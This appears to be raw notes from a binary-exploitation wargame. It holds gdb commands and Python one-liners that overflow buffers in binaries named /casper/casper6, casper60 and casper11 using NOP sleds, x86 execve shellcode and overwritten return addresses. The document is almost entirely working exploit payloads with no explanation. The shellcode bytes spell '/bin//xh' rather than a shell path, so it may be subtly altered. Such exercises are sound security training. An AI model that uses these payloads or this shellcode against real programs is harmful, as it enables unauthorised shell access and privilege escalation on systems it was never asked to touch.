disas greetUser
break *
x/200xb $esp
p $esp
p &somedata

run $(python -c "print ('A'* 1015)")

'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

/casper/casper6 run $(python -c "print ('\x90'* 978 + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80' + '\xe0\x97\x04\x08') ")

/casper/casper60  $(python -c "print ('\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80' + '\x41'* 979 + '\x60\x98\x04\x08') ")

/casper/casper11 <<< $(python -c "print ('\x41' * 1000 + '\x9c\x88\x04\x08') ")

find 0x080485c2, 0x080485c2 + 2000, 0x00000001
